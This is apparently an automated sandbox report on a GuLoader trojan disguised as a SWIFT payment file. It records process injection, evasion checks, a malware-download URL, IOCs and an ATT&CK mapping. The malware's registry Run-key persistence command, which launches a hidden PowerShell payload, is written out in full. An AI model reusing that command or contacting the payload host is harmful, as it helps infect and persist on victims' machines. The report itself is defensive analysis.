Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5411			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3628			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7172

Thread sleep time: -6456360425798339s >= -30000s

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	Code function: 0_2_0040290B FindFirstFileW,	0_2_0040290B
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	Code function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C13
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	Code function: 0_2_0040683D FindFirstFileW,FindClose,	0_2_0040683D
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Code function: 7_2_0040290B FindFirstFileW,	7_2_0040290B
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Code function: 7_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	7_2_00405C13
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Code function: 7_2_0040683D FindFirstFileW,FindClose,	7_2_0040683D

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache	Jump to behavior
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	File opened: C:\Users\user\AppData\Local\Microsoft	Jump to behavior

Source: Vitis.exe, 00000007.00000002.2926772694.0000000002477000.00000004.00000020.00020000.00000000.sdmp, Vitis.exe, 00000007.00000002.2926772694.000000000242D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Vitis.exe, 00000007.00000002.2926772694.0000000002477000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWhK

Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	API call chain: ExitProcess graph end node			graph_0-3975
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	API call chain: ExitProcess graph end node			graph_0-3979

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 1_2_069E7118 LdrInitializeThunk,

1_2_069E7118

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Users\user\AppData\Local\Temp\Vitis.exe base: 1720000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Users\user\AppData\Local\Temp\Vitis.exe base: 19FFF4			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c "set /A 1^^0	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Vitis.exe C:\Users\user\AppData\Local\Temp\Vitis.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bortopereringer" /t REG_EXPAND_SZ /d "%Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes)	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bortopereringer" /t REG_EXPAND_SZ /d "%Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes)"	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Process created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "bortopereringer" /t reg_expand_sz /d "%trimmere% -windowstyle minimized $storkenes=(get-itemproperty -path 'hkcu:\oxylabrax\').discumber;%trimmere% ($storkenes)
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Process created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "bortopereringer" /t reg_expand_sz /d "%trimmere% -windowstyle minimized $storkenes=(get-itemproperty -path 'hkcu:\oxylabrax\').discumber;%trimmere% ($storkenes)			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe

Code function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_004034F7

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	11 Masquerading	OS Credential Dumping	111 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	11 Command and Scripting Interpreter	1 DLL Side-Loading	111 Process Injection	1 Modify Registry	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Clipboard Data	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 PowerShell	Logon Script (Windows)	1 Registry Run Keys / Startup Folder	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	1 Access Token Manipulation	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	111 Process Injection	LSA Secrets	3 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	14 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	58%	ReversingLabs	Win32.Trojan.GuLoader
New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\Vitis.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Vitis.exe	58%	ReversingLabs	Win32.Trojan.GuLoader

Source	Detection	Scanner	Label
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://g-eurasia-ru.com/fan/ZfUdfOc32.binM	0%	Avira URL Cloud	safe
http://g-eurasia-ru.com/fan/ZfUdfOc32.binu	0%	Avira URL Cloud	safe
http://g-eurasia-ru.com/fan/ZfUdfOc32.bin	0%	Avira URL Cloud	safe
http://g-eurasia-ru.com/fan/ZfUdfOc32.binA	0%	Avira URL Cloud	safe
http://g-eurasia-ru.com/fan/ZfUdfOc32.binZ	0%	Avira URL Cloud	safe
http://g-eurasia-ru.com/fan/ZfUdfOc32.binD	0%	Avira URL Cloud	safe
http://g-eurasia-ru.com/fan/ZfUdfOc32.binh	0%	Avira URL Cloud	safe
http://g-eurasia-ru.com/fan/ZfUdfOc32.binDomiPhaclg-logistic.com.ua/toys/ZfUdfOc32.binSlanOelmig-pal	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
g-eurasia-ru.com	192.121.162.150	true	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.2595448132.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://g-eurasia-ru.com/fan/ZfUdfOc32.binM	Vitis.exe, 00000007.00000002.2926772694.0000000002473000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000001.00000002.2592920909.0000000004B36000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://aka.ms/pscore6lB	powershell.exe, 00000001.00000002.2592920909.00000000049E1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000001.00000002.2592920909.0000000004B36000.00000004.00000800.00020000.00000000.sdmp	false		high
http://g-eurasia-ru.com/fan/ZfUdfOc32.binu	Vitis.exe, 00000007.00000002.2926772694.0000000002473000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000001.00000002.2595448132.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.2595448132.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://g-eurasia-ru.com/fan/ZfUdfOc32.binZ	Vitis.exe, 00000007.00000002.2926772694.0000000002473000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://g-eurasia-ru.com/fan/ZfUdfOc32.binz	Vitis.exe, 00000007.00000002.2926772694.000000000242D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://contoso.com/License	powershell.exe, 00000001.00000002.2595448132.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://g-eurasia-ru.com/fan/ZfUdfOc32.binDomiPhaclg-logistic.com.ua/toys/ZfUdfOc32.binSlanOelmig-pal	Vitis.exe, 00000007.00000002.2938761024.000000001E350000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000001.00000002.2595448132.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://g-eurasia-ru.com/fan/ZfUdfOc32.bin	Vitis.exe, 00000007.00000002.2938761024.000000001E350000.00000004.00001000.00020000.00000000.sdmp, Vitis.exe, 00000007.00000002.2926772694.0000000002473000.00000004.00000020.00020000.00000000.sdmp, Vitis.exe, 00000007.00000002.2926772694.0000000002477000.00000004.00000020.00020000.00000000.sdmp, Vitis.exe, 00000007.00000002.2926772694.000000000242D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe, Vitis.exe.1.dr	false		high
http://g-eurasia-ru.com/fan/ZfUdfOc32.binA	Vitis.exe, 00000007.00000002.2926772694.000000000242D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://g-eurasia-ru.com/fan/ZfUdfOc32.binD	Vitis.exe, 00000007.00000002.2926772694.0000000002473000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.2592920909.00000000049E1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000001.00000002.2592920909.0000000004B36000.00000004.00000800.00020000.00000000.sdmp	false		high
http://g-eurasia-ru.com/fan/ZfUdfOc32.binh	Vitis.exe, 00000007.00000002.2926772694.0000000002473000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
192.121.162.150	g-eurasia-ru.com	Sweden		43350	NFORCENL	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1410987
Start date and time:	2024-03-18 14:35:48 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe
Detection:	MAL
Classification:	mal100.troj.winEXE@13/11@1/1
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 93% Number of executed functions: 103 Number of non-executed functions: 77
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Vitis.exe, PID 7512 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 7108 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe

Simulations

Behavior and APIs

Time	Type	Description
13:37:12	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Bortopereringer %Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes)
13:37:20	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Bortopereringer %Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes)
14:36:41	API Interceptor	41x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
192.121.162.150	Swift_TT_CONFIRMATION_381073_3081HA_3847_309173XH_3087262C_DDIRK.exe	Get hash	malicious	GuLoader	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
g-eurasia-ru.com	Swift_TT_CONFIRMATION_381073_3081HA_3847_309173XH_3087262C_DDIRK.exe	Get hash	malicious	GuLoader	Browse	192.121.162.150

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NFORCENL	Swift_TT_CONFIRMATION_381073_3081HA_3847_309173XH_3087262C_DDIRK.exe	Get hash	malicious	GuLoader	Browse	192.121.162.150
	http://www.madrasaenajah.com/lob-yhIe~Mf/C/	Get hash	malicious	Phisher	Browse	77.81.121.143
	http://www.ppploan.net/zob-Bj5e~yf/C/	Get hash	malicious	Phisher	Browse	77.81.121.143
	SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll	Get hash	malicious	CobaltStrike	Browse	185.66.143.178
	http://www.madrasaenajah.com/lob-EPZb~Mf/C/	Get hash	malicious	Phisher	Browse	77.81.121.143
	https://hostagequ.win/100fee21b777b58e800/fdg	Get hash	malicious	Phisher	Browse	77.81.121.143
	http://www.jamaicanmoringa.net/enb-VXPc~yf/C/	Get hash	malicious	Phisher	Browse	77.81.121.143
	http://www.jamaicanmoringa.net/enb-VXPc~yf/C/	Get hash	malicious	Phisher	Browse	77.81.121.143
	http://www.gemstats.net/1mb-ss~yf/C/	Get hash	malicious	Phisher	Browse	77.81.121.143
	http://www.coslessociety.com/Emb-4m6~yf/C/	Get hash	malicious	Phisher	Browse	77.81.121.143

Process:	C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe
File Type:	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
Category:	dropped
Size (bytes):	958
Entropy (8bit):	3.546011626462722
Encrypted:	false
SSDEEP:	12:8wl0ha/ledp8wXuQUlbqpsOtUxmbdpYmHbqetUgoRKQ1fAYFaSHgzJCN85v4t2YE:89dO/9fcd9No9dvHC24qy
MD5:	58D9261727208D46F702F8242733DDC6
SHA1:	1360EAFCD10C2A453F427F299F6AD219ECAFACF9
SHA-256:	9D862443CD679FC3367B89CFCBEC60BDDC86FCCE3C493ED90B88388FB6B00CC9
SHA-512:	39F10B1FB5563B5D31CBC1C2144CE43D7E3E7A539017D6CD7042E3E3D453D0AE1F9162906AF336FDF3B4FEF4D55A71F2D37972F119EF5F5B0BD7CC46A50AC4CD
Malicious:	false
Reputation:	low
Preview:	L..................F.............................................................P.O. .:i.....+00.../C:\...................z.1...........Program Files (x86).X............................................P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...".f.1...........Common Files..J............................................C.o.m.m.o.n. .F.i.l.e.s.......2...........Tankvognskrselsulykke.geo.d............................................T.a.n.k.v.o.g.n.s.k.r.s.e.l.s.u.l.y.k.k.e...g.e.o...(...C.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.o.m.m.o.n. .F.i.l.e.s.\.T.a.n.k.v.o.g.n.s.k.r.s.e.l.s.u.l.y.k.k.e...g.e.o.A.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.m.e.d.l.e.m.s.k.a.r.t.o.t.e.k.\.v.e.j.m.a.t.e.r.i.a.l.e.r.n.e.........,...............$M....>M...EQ ..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	8003
Entropy (8bit):	4.838950934453595
Encrypted:	false
SSDEEP:	192:Dxoe5nVsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9smMdcU6CDpOeik:N+VoGIpN6KQkj2xkjh4iUxeLib4J
MD5:	4C24412D4F060F4632C0BD68CC9ECB54
SHA1:	3856F6E5CCFF8080EC0DBAC6C25DD8A5E18205DF
SHA-256:	411F07FE2630E87835E434D00DC55E581BA38ECA0C2025913FB80066B2FFF2CE
SHA-512:	6538B1A33BF4234E20D156A87C1D5A4D281EFD9A5670A97D61E3A4D0697D5FFE37493B490C2E68F0D9A1FD0A615D0B2729D170008B3C15FA1DD6CAADDE985A1C
Malicious:	false
Reputation:	moderate, very likely benign file
